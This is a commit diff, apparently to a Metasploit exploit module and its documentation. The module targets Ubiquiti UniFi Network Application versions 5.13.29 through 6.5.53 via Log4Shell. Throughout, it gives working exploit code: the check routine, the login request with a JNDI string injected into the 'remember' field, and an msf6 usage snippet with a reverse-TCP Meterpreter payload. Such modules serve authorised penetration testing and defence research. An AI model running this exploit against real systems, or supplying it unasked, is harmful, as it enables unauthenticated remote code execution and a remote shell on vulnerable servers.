Add details to check codes and PR feedback
This commit is contained in:
parent
579627f5c7
commit
458d584f83
|
@ -2,8 +2,9 @@
|
||||||
|
|
||||||
### Description
|
### Description
|
||||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||||
deserialize a malicious Java object. This results in OS command execution.
|
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||||
|
object. This results in OS command execution in the context of the server application.
|
||||||
|
|
||||||
This module will start an LDAP server that the target will need to connect to.
|
This module will start an LDAP server that the target will need to connect to.
|
||||||
|
|
||||||
|
@ -33,7 +34,6 @@ Older versions of the UniFi Network Application can be downloaded from [communit
|
||||||
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
|
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
|
||||||
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
|
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
|
||||||
|
|
||||||
|
|
||||||
```
|
```
|
||||||
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
||||||
[*] Using configured payload windows/meterpreter/reverse_tcp
|
[*] Using configured payload windows/meterpreter/reverse_tcp
|
||||||
|
|
|
@ -14,8 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||||
deserialize a malicious Java object. This results in OS command execution.
|
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||||
|
object. This results in OS command execution in the context of the server application.
|
||||||
|
|
||||||
This module will start an LDAP server that the target will need to connect to.
|
This module will start an LDAP server that the target will need to connect to.
|
||||||
},
|
},
|
||||||
|
@ -77,10 +78,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def check
|
def check
|
||||||
validate_configuration!
|
validate_configuration!
|
||||||
res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
|
res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
|
||||||
return Exploit::CheckCode::Unknown if res.nil?
|
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||||
|
|
||||||
server_version = res.get_json_document.dig('meta', 'server_version')
|
server_version = res.get_json_document.dig('meta', 'server_version')
|
||||||
return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
|
return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
|
||||||
|
|
||||||
vprint_status("Detected version: #{server_version}")
|
vprint_status("Detected version: #{server_version}")
|
||||||
server_version = Rex::Version.new(server_version)
|
server_version = Rex::Version.new(server_version)
|
||||||
|
@ -93,12 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
|
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
|
||||||
|
|
||||||
start_service
|
start_service
|
||||||
trigger
|
res = trigger
|
||||||
|
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||||
|
|
||||||
wait_until { @search_received }
|
wait_until { @search_received }
|
||||||
return Exploit::CheckCode::Unknown unless @search_received
|
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
|
||||||
|
|
||||||
Exploit::CheckCode::Vulnerable
|
|
||||||
ensure
|
ensure
|
||||||
stop_service
|
stop_service
|
||||||
end
|
end
|
||||||
|
@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'ctype' => 'application/json',
|
'ctype' => 'application/json',
|
||||||
'data' => {
|
'data' => {
|
||||||
'username' => jndi_string,
|
'username' => rand_text_alphanumeric(8..16), # can not be blank!,
|
||||||
'password' => rand_text_alphanumeric(8..16), # can not be blank!
|
'password' => rand_text_alphanumeric(8..16), # can not be blank!
|
||||||
'remember' => jndi_string,
|
'remember' => jndi_string,
|
||||||
'strict' => true
|
'strict' => true
|
||||||
|
|
Loading…
Reference in New Issue